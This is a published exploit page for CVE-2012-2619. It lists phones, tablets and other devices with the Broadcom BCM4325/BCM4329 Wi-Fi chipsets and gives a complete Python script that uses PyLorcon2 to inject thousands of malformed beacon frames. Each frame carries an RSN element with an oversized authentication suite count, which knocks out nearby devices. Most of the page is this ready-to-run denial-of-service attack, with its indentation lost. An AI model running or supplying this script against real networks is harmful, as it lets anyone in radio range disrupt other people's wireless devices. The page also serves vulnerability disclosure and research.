Broadcom BCM4325 / BCM4329 Denial Of Service

🗓️ 16 Nov 2012 00:00:00Reported by Core Security TechnologiesType

packetstorm🔗 packetstormsecurity.com👁 54 Views

Broadcom BCM4325 / BCM4329 Denial Of Service on various device

Reporter	Title	Published	Views	Family All 15
Tenable Nessus	Apple iOS < 6.1 Multiple Vulnerabilities	30 Jan 201300:00	–	nessus
Tenable Nessus	Apple TV < 5.2 Multiple Vulnerabilities	4 Feb 201300:00	–	nessus
Tenable Nessus	Apple iOS < 6.1 Multiple Vulnerabilities	29 Jan 201300:00	–	nessus
Core Security	Broadcom DoS on BCM4325 and BCM4329 devices	23 Oct 201200:00	–	coresecurity
CVE	CVE-2012-2619	14 Nov 201211:00	–	cve
Cvelist	CVE-2012-2619	14 Nov 201211:00	–	cvelist
Debian CVE	CVE-2012-2619	14 Nov 201211:00	–	debiancve
NVD	CVE-2012-2619	14 Nov 201212:30	–	nvd
Prion	Out-of-bounds	14 Nov 201212:30	–	prion
securityvulns	APPLE-SA-2013-01-28-2 Apple TV 5.2	4 Feb 201300:00	–	securityvulns

`# Exploit Author:  
CoreLabs (Core Security Technologies) fue descubierta por el  
investigador argentino Andrés Blanco,  
# Vendor Homepage:  
# Software Link: [download link if available]  
# Version: 1.0  
# Tested on:  
Apple iPhone 3GS  
Apple iPod 2G  
HTC Touch Pro 2  
HTC Droid Incredible  
Samsung Spica  
Acer Liquid  
Motorola Devour  
Vehículo Ford Edge  
Dispositivos afectados con el chipset BCM4329:  
Apple iPhone 4  
Apple iPhone 4 Verizon  
Apple iPod 3G  
Apple iPad Wi-Fi  
Apple iPad 3G  
Apple iPad 2  
Apple Tv 2G  
Motorola Xoom  
Motorola Droid X2  
Motorola Atrix  
Samsung Galaxy Tab  
Samsung Galaxy S 4G  
Samsung Nexus S  
Samsung Stratosphere  
Samsung Fascinate  
HTC Nexus One  
HTC Evo 4G  
HTC ThunderBolt  
HTC Droid Incredible 2  
LG Revolution  
Sony Ericsson Xperia Play  
Pantech Breakout  
Nokia Lumina 800  
Kyocera Echo  
Asus Transformer Prime  
Malata ZPad"  
  
# CVE : 2012-2619  
#!/usr/bin/env python  
  
import sys  
import time  
import struct  
import PyLorcon2  
  
def beaconFrameGenerator():  
sequence = 0  
while(1):  
sequence = sequence % 4096  
  
# Frame Control  
frame = '\x80' # Version: 0 - Type: Managment - Subtype: Beacon  
frame += '\x00' # Flags: 0  
frame += '\x00\x00' # Duration: 0  
frame += '\xff\xff\xff\xff\xff\xff' # Destination: ff:ff:ff:ff:ff:ff  
frame += '\x00\x00\x00\x15\xde\xad' # Source: 00:00:00:15:de:ad  
frame += '\x00\x00\x00\x15\xde\xad' # BSSID: 00:00:00:15:de:ad  
frame += struct.pack('H', sequence) # Fragment: 0 - Sequenence:  
#part of the generator  
# Frame Body  
frame += struct.pack('Q', time.time()) # Timestamp  
frame += '\x64\x00' # Beacon Interval: 0.102400 seconds  
frame += '\x11\x04' # Capability Information: ESS, Privacy,  
#Short Slot time  
# Information Elements  
# SSID: buggy  
frame += '\x00\x05buggy'  
# Supported Rates: 1,2,5.5,11,18,24,36,54  
frame += '\x01\x08\x82\x84\x8b\x96\x24\x30\x48\x6c'  
# DS Parameter Set: 6  
frame += '\x03\x01\x06'  
# RSN IE  
frame += '\x30' # ID: 48  
frame += '\x14' # Size: 20  
frame += '\x01\x00' # Version: 1  
frame += '\x00\x0f\xac\x04' # Group cipher suite: TKIP  
frame += '\x01\x00' # Pairwise cipher suite count: 1  
frame += '\x00\x0f\xac\x00' # Pairwise cipher suite 1: TKIP  
frame += '\xff\xff' # Authentication suites count: 65535  
frame += '\x00\x0f\xac\x02' # Pairwise authentication suite 2: PSK  
frame += '\x00\x00'  
  
sequence += 1  
yield frame  
  
if __name__ == "__main__":  
if len(sys.argv) != 2:  
print "Usage:"  
print "\t%s <wireless interface>" % sys.argv[0]  
sys.exit(-1)  
  
iface = sys.argv[1]  
context = PyLorcon2.Context(iface)  
context.open_injmon()  
  
generator = beaconFrameGenerator()  
  
for i in range(10000):  
frame = generator.next()  
time.sleep(0.100)  
context.send_bytes(frame)  
  
  
`

16 Nov 2012 00:00Current

0.1Low risk

Vulners AI Score0.1

EPSS0.26529